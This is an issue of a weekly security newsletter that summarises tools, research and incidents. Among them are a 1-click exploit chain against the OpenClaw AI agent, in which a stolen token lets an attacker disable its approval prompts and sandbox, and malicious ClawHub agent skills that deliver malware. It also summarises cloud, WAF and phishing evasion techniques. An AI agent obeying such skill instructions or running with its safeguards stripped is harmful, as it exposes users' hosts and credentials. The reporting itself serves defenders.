Release Date: 9th February 2026 | Issue: 58 | Subscribe
The Security Pills newsletter is a hand curated zine (delivered once per week) that highlights security related-news. 10+ hours of reading and analysis condensed into a 5-minute summary every Monday morning.
Sponsor
Would you like to become a sponsor for our newsletter? Our mission is to highlight security-related news with a focus on quality content, while we help people staying up to date with this corner of the industry.If you are interested, reach out to [email protected] with your ad idea to get started!
Application Security
Jerry Gamblin publishes GhostCVEs, a tool that finds vulnerability identifiers mentioned in public sources but missing from official CVE databases. The platform scans GitHub commits, security advisories, and RSS feeds to collect CVE references, then checks them against local copies of NVD and MITRE databases to spot gaps. It runs automated scans every six hours and creates reports in various formats. The system stores historical data in an SQLite database and plans to add features for detecting fake or AI-generated CVE mentions.
Wiz's Gal Nagli details an exposed Supabase API key in client-side JavaScript without Row Level Security protections. The misconfiguration granted unauthenticated access to the entire production database, exposing 1.5 million API authentication tokens, 35,000 email addresses, and private messages containing unencrypted third-party API keys. Write access to the database allowed unauthenticated modification of posts and injection of malicious content. The exposure revealed that the platform's 1.5 million agents were controlled by only 17,000 human users (88:1 ratio), contradicting its positioning as an autonomous AI-native social network.
The incident demonstrates a growing problem: AI-powered development tools make building software much easier, but developers often skip essential security practices in the process.
PortSwigger's 19th annual Top 10 Web Hacking Techniques, curated from 63 community nominations, was won by Vladislav Korchagin's Successful Errors, introducing error based techniques for exploiting blind server side template injection with polyglot detection methods.
The list highlighted the rise of side channels as a core exploitation primitive, featuring two XS-Leak entries alongside ORM based data extraction, Unicode normalization attacks, Next.js internal cache poisoning, HTTP/2 CONNECT abuse, a technique for making blind SSRF visible, SOAP deserialization chains leading to RCE, and parser differentials.
Artificial Intelligence
Built by Simon Willison, Claude Code Transcripts is a command-line tool that converts Claude AI coding session files into readable, paginated HTML documents. The tool can process sessions from three sources: local files stored on your computer, web sessions accessed through Claude's API, or individual JSON files. It creates organized output with index pages and multi-page transcripts that work well on mobile devices. Users can customize where files are saved, automatically upload results to GitHub Gist for sharing, and include original session data for archival purposes.
Praetorian's Evan Leleux released Julius, an open source tool that identifies LLM server software running on network endpoints, addressing the growing shadow AI problem of thousands of unauthenticated inference servers exposed on the internet. Julius distinguishes between platforms like Ollama, vLLM, and Hugging Face deployments using YAML based probes.
A persistent memory system for Claude Code that maintains project context across sessions through automatic observation capture and semantic summarization. It employs a token-efficient 3-layer search workflow combining full-text queries, chronological context retrieval, and selective detail fetching.
Jimmy Vo explores task management for agentic coding, comparing his custom tk CLI tool with Anthropic's native Claude Code tasks. His approach uses a bash script that stores tickets as markdown files in .tickets/, paired with a Claude skill and project manager agent that generates tickets from RFCs and tracks dependencies. Anthropic's solution evolved from simple todos to structured JSON-based dependency graphs. Both give AI agents structured task tracking and dependency awareness.
Blue Team
Datadog's Ryan Simon identified a campaign that hijacked web traffic through malicious NGINX configuration injection, likely gaining initial access via React2Shell exploitation (CVE-2025-55182). Attackers deployed shell scripts that discovered NGINX installations, including Baota panel environments, and injected malicious location blocks routing requests through attacker controlled proxies, validating syntax and using graceful reloads to avoid disruption.
The campaign targeted Asian TLDs, government and educational domains, and generic TLDs, each mapped to different attacker backends and gambling related URL paths, while exfiltrating hijacked domain mappings to C2 infrastructure
Clawdstrike provides runtime security enforcement for agent-based systems and EDR development on OpenClaw. Features seven security guards, multi-layer jailbreak detection, output sanitization, and cryptographically signed audit trails.
Google's Threat Intelligence Group disrupted IPIDEA, one of the world's largest residential proxy networks, which operated through four SDK brands sharing ~7,400 proxy servers. The network embedded these SDKs into 600+ Android apps and 3,075 Windows programs, silently turning devices into proxy exit nodes. IPIDEA also controlled 13 proxy/VPN brands and facilitated botnets including BadBox2.0, Aisuru, and Kimwolf. In a single week, 550+ tracked threat groups from China, DPRK, Iran, and Russia were observed using IPIDEA for SaaS compromise and password spraying.
Van Vleet proposes extending the TTP framework with a fourth layer, Instances, creating TTPI. The current model mixes abstract patterns (procedures) with real-world examples (instances). Procedures are stable recipes; instances are the ever-changing dishes made from them.
This distinction helps teams prioritize detection: blocking procedures forces attackers into a limited playbook, while chasing individual instances leads to an endless cycle where attackers generate new variations faster than defenders can respond.
Cloud Security
Dropkit is a command-line tool for managing DigitalOcean droplet lifecycles with automated SSH configuration and Tailscale VPN integration. It enables cost optimization through hibernation, snapshotting and destroying droplets to stop billing while preserving state for restoration.
Sebastian Toader presents Riptides, a platform that replaces long-lived OpenAI API keys with short-lived credentials through an identity-first architecture. It verifies workload identity using SPIFFE standards, exchanges identity tokens for temporary keys via Vault or OpenBao, and enforces access at the kernel level through a custom Linux sysfs file. Credentials default to 15-minute TTLs and are automatically revoked, letting developers retrieve keys via simple file reads without embedding Vault SDKs.
Omer Amiad discovered GatewayToHeaven (CVE-2025-13292), a cross tenant vulnerability in Google Cloud's Apigee allowing read and write access to analytics data across all tenants, potentially enabling end user impersonation across any organization using the service.
The attack began by targeting the GKE metadata endpoint through an Apigee API proxy, bypassing SSRF protections via the AssignMessage policy to obtain the Message Processor's service account token. That token's bucket write permissions allowed replacing Dataflow pipeline JARs with malicious code, then triggering autoscaling via PubSub floods to execute them. The resulting Dataflow service account had cross tenant access to metadata buckets and GCS datastores containing request logs with plaintext access tokens for all Apigee customers.
Container Security
Trail of Bits has released a containerized development environment that allows Claude AI to execute commands freely while keeping your main system safe. The tool uses Docker containers to create isolated workspaces where Claude can run unrestricted operations during security audits and code reviews. Users can choose between single-project containers or shared workspaces for multiple repositories. For sensitive work, network access can be restricted using firewall rules. The system works with both command-line tools and popular IDEs, with specific performance tweaks available for Mac users running Apple Silicon processors.
Palantir outlines five security dimensions for deploying AI agents in production. Scalable model access is provided through regional hubs with guarantees that no data is retained by third party providers. Agent orchestration runs on ephemeral Kubernetes infrastructure with 48 hour node limits and a three factor permission model combining owner, service user, and delegated user rights. Memory governance unifies four modalities (working, episodic, semantic, and procedural) through their Ontology system, applying consistent marking and role based policies at runtime. Tool usage is secured through provenance based controls that resolve entire call chains at runtime, blocking unauthorized data flows across nested tools. Integrated observability traces agent activity from data to decision, linking queries to version histories and LLM functions to evaluation suites.
Red Team
Rafael Castilho found reflected XSS in Salesforce Commerce Cloud's EinsteinCarousel-Load controller, bypassed Cloudflare WAF using Unicode escapes, then weaponized the WAF to block OAuth callbacks and intercept one-time authentication codes for account takeover.
Depthfirst's Mav Levin chained two vulnerabilities in OpenClaw into a 1-click RCE exploit. First, a logic flaw discovered by depthfirst's automated scanning: clicking a URL with a malicious gatewayUrl parameter forces OpenClaw to connect to an attacker controlled server and leak the user's auth token during the handshake. Second, a missing WebSocket origin validation that Levin discovered, enabling Cross-Site WebSocket Hijacking to reach the victim's localhost OpenClaw instance from a malicious webpage. With the stolen admin scoped token, the attacker disables safety features (user approval prompts and container sandboxing) via the API and executes arbitrary commands on the host, all without user interaction beyond the initial click.
Supply Chain
DNSimple transformed GitHub repository management from manual configuration to automated infrastructure as code using Terraform. An initial Ruby tool (Repocop) failed because it required local execution with no review process or change tracking. The breakthrough came in 2024 when GitHub Actions and Terraform Cloud enabled a PR based workflow where proposed changes generated preview plans automatically and approved merges triggered deployment, no local Terraform required. Starting with basic settings, they expanded to templates, code ownership files, and configurations across hundreds of repositories, later adopting the same pattern for DNS, cloud, and server infrastructure.
Sysdig's Alberto Pellitteri analyzed how the Shai-Hulud worm weaponized self hosted GitHub Actions runners as persistent backdoors. After compromising machines through trojanized NPM packages, the worm created repositories with discussions enabled, installed runners with root privileges in hidden directories, and used an intentionally vulnerable workflow as a C2 channel, executing commands posted as discussion comments. Persistence was achieved by disabling process cleanup and optionally installing the runner as a system service. All traffic flowed to github.com, evading traditional network defenses.
Block built BinauthZ, a plugin for their existing admission controller that cryptographically verifies container images are signed and come from trusted build pipelines before running in Kubernetes. Verification rules are configuration-driven, and the plugin handles scale through concurrent verification and layered caching while distinguishing real policy violations from temporary infrastructure issues. Block built this in-house to avoid operational complexity, vendor lock-in, and per-node pricing.
OpenClaw skills in the ClawHub marketplace are being exploited as malware delivery vectors, with VirusTotal identifying hundreds of malicious packages among 3,016+ analyzed. These attacks weaponize setup workflows that instruct users to execute untrusted code, since the skill files themselves are nearly empty, traditional antivirus fails to detect them.
VirusTotal's Code Insight surfaces these patterns by analyzing SKILL.md behavior. Notable case: user "hightower6eu" published 314+ malicious skills delivering Windows packed trojans and macOS Atomic Stealer (AMOS), which harvests passwords, browser credentials, and crypto wallets.
Chainguard's Adrian Mouat shows how to eliminate long lived GitHub Personal Access Tokens when running Renovate as a GitHub Action by using Octo STS, an open source security token service built by Chainguard that exchanges the action's OIDC token for a short lived GitHub token whose permissions are defined in a per repository YAML policy file. This also addresses the default GitHub Action token's inability to update workflow files.
Threat Hunting
Jamf Threat Labs' Thijs Xhaflaire uncovered a North Korean campaign abusing Visual Studio Code's task configuration to deliver malware, extending the "Contagious Interview" operation. Victims clone malicious GitHub or GitLab repositories and, upon trusting the workspace in VS Code, unknowingly execute commands embedded in tasks.json that fetch JavaScript payloads from Vercel infrastructure.
The payload establishes a persistent backdoor that beacons to a command server every five seconds, enabling remote code execution while collecting system details such as hostname, MAC addresses, and public IP for victim fingerprinting. Jamf recommends developers scrutinize repository contents and task configurations before granting workspace trust.
Rapid7 researchers Jan Blažek and Calvin House found threat actors leveraging AWS WorkMail to sidestep SES sandbox restrictions and build phishing infrastructure. Using compromised AWS credentials, attackers escalated to AdministratorAccess, created WorkMail organizations via workmail:CreateOrganization, and verified domains through ses:VerifyDomainIdentity and ses:VerifyDomainDkim. By pivoting to WorkMail rather than requesting SES sandbox removal, they gained immediate external sending to up to 100,000 recipients per day per organization, far exceeding the sandbox limit of 200 messages daily to verified recipients.
This technique makes web-sent emails appear in CloudTrail as ses:SendRawEmail events but mask the sender's real IP behind workmail..amazonaws.com, while SMTP-sent emails produce no CloudTrail logs at all, even with SES data events enabled.
Wrapping Up
If you enjoyed this newsletter and think others would too, It would mean a lot for us if you'd forward this email to other people who may enjoy it as well. You can also reply to this email, I'd love to get in touch with you.
Thanks,
Sebas